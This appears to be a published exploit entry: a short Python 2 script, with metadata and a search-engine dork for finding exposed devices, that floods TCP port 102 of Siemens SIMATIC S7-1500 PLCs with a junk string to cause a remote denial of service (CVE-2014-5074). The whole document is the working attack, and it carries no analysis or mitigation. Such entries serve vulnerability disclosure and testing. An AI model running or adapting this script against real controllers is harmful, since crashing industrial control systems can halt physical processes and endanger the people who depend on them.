# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074
#!/usr/bin/python
import socket
import sys
from time import sleep
if len(sys.argv) != 2:
print "Usage: exploit.py <ip>"
sys.exit(0)
for x in range(1,50):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#vulnerable TCP port 102
connect=s.connect((str(sys.argv[1]), 102))
s.send('some evil string \r\n\n')
print "bufff " + str(x) + " sent...\n"
result=s.recv(1024)
print result
s.close()
sleep(7)